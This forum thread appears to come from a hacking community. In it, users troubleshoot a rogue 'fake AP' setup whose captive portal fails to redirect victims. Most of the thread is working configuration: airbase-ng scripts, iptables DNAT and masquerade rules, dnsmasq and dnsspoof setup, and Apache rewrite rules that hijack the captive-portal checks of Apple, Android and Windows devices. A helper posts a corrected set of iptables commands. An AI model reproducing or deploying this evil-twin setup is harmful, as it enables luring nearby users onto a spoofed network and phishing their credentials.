Fake AP Troubleshooting - Not Redirected to Fake Webpage

rogueap

(AnonymousHaxorz) #22

Tried to attach a video and I can’t because it’s not a supported extension, but here’s some screenshots, first shows me waiting for a minute or so with no portal, second shows that the DNS server is working properly, third shows my desktop shortly after connecting, fourth, my trying to trigger the page by going to Google, and fifth shows the desktop result of that.


(AnonymousHaxorz) #23

Hope this helps for troubleshooting purposes


(Hardeep Singh) #24

is dnsspoof running?
As far as I remember, you do not need to run dnsspoof with mobile devices but to be sure do try running dnsspoof -i at0, disable Internet access to client and test again.

echo 0 > /proc/sys/net/ipv4/ip_forward

I’d like to see all the configuration files you are using in /etc/apache2/sites-enabled/

You can also attach a youtube video here also, It’ll work just fine.


(AnonymousHaxorz) #25

Below is all of the scripts and configuration files I wrote: Airbase setup, Dnsmasq Setup, Dnsspoof Setup, Dnsmasq.conf and 000-default.conf

#!/bin/sh
echo "Starting wlan0..."
ifconfig wlan0 up
echo
echo "Setting wlan0 into monitor mode..."
iwconfig wlan0 mode monitor
echo
echo "Setting txpower to 30dBm..."
iwconfig wlan0 txpower 30
echo
echo "Killing conflicting processes..."
airmon-ng check kill
echo
echo "Starting airbase-ng..."
airbase-ng -e "Test" -c 6 wlan0
#!/bin/sh
echo "Enabling at0 at 10.0.0.1..."
ifconfig at0 10.0.0.1 up
echo
echo "Flushing current iptables..."
iptables --flush
iptables --table nat --flush
echo
echo "Setting up PREROUTING iptable..."
iptables --table nat --append PREROUTING -i wlan0 -p tcp -j DNAT --to-destination 10.0.0.1:80
echo
echo "Setting up FORWARD iptable..."
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo
echo "Setting up POSTROUTING iptable..."
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
echo
echo "Starting dnsmasq..."
dnsmasq -C "../files/dnsmasq.conf" -d
#!/bin/sh
echo "Starting up at0 at 10.0.0.1..."
ifconfig at0 10.0.0.1 up
echo
echo "Starting apache2 service..."
service apache2 start
echo
echo "Starting mysql service..."
service mysql start
echo
echo "Enabling ip_forward..."
echo "1" > /proc/sys/net/ipv4/ip_forward
echo
echo "Starting dnsspoof..."
dnsspoof -i at0
interface=at0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=10.0.0.1
log-queries
log-dhcp
listen-address=127.0.0.1
<VirtualHost *:80>
	# The ServerName directive sets the request scheme, hostname and port that
	# the server uses to identify itself. This is used when creating
	# redirection URLs. In the context of virtual hosts, the ServerName
	# specifies what hostname must appear in the request's Host: header to
	# match this virtual host. For the default virtual host (this file) this
	# value is not decisive as it is used as a last resort host regardless.
	# However, you must set it for any further virtual host explicitly.
	#ServerName www.example.com

	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html/

# apple
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^CaptiveNetworkSupport(.*)$ [NC]
RewriteCond %{HTTP_HOST} !^10.0.0.1$
RewriteRule ^(.*)$ http://10.0.0.1/index.html [L,R=302]

# android
RedirectMatch 302 /generate_204 /

# windows
#RedirectMatch 302 /ncsi.txt http://10.0.0.1/
RedirectMatch 302 /connecttest.txt http://10.0.0.1/
RewriteRule /redirect index.html [R=302,L]

#RewriteRule !^redirect($|/) http://10.0.0.1 [L,R=302]
	# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
	# error, crit, alert, emerg.
	# It is also possible to configure the loglevel for particular
	# modules, e.g.
	#LogLevel info ssl:warn

	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined

	# For most configuration files from conf-available/, which are
	# enabled or disabled at a global level, it is possible to
	# include a line for only one particular virtual host. For example the
	# following line enables the CGI configuration for this host only
	# after it has been globally disabled with "a2disconf".
	#Include conf-available/serve-cgi-bin.conf
</VirtualHost>

    # vim: syntax=apache ts=4 sw=4 sts=4 sr noet

(Hardeep Singh) #26

Here are the proposed changes:

  1. Remove this line from iptables commands:
iptables --table nat --append PREROUTING -i wlan0 -p tcp -j DNAT --to-destination 10.0.0.1:80 
  1. Disable internet access for now. Change the line to:
echo "Disable ip_forward..."
echo "0" > /proc/sys/net/ipv4/ip_forward

rest seems fine to me.


(AnonymousHaxorz) #27

Made the proposed changes, except now it doesn’t forward any connections. Before with the other Iptable it would forward the connection, just not to the right place. I know we’re close just don’t know what needs to be added or changed.


(Hardeep Singh) #28

Well, here are the 4 commands I use for my captive portal each time.

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE 
iptables --append FORWARD --in-interface at0 -j ACCEPT 
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80 
iptables -t nat -A POSTROUTING -j MASQUERADE

with apache, dnsmasq running and dnsspoof / ip_forward disabled.